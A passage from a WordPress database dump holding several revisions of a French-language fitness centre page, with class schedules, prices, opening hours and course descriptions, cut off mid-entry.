(195, 1, '2013-07-03 17:40:44', '2013-07-03 17:40:44', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 38%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:44', '2013-07-03 17:40:44', '', 11, 'http://www.crosstrainingcenter.be/?p=195', 0, 'revision', '', 0),
(196, 1, '2013-07-03 17:40:57', '2013-07-03 17:40:57', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 41%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:40:57', '2013-07-03 17:40:57', '', 11, 'http://www.crosstrainingcenter.be/?p=196', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(197, 1, '2013-07-03 17:41:14', '2013-07-03 17:41:14', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 43%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:41:14', '2013-07-03 17:41:14', '', 11, 'http://www.crosstrainingcenter.be/?p=197', 0, 'revision', '', 0),
(199, 1, '2013-07-03 17:49:28', '2013-07-03 17:49:28', '<h2>Team Training :</h2>\r\nLes séances sont programmées selon le planning ci-dessous.\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 45%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance 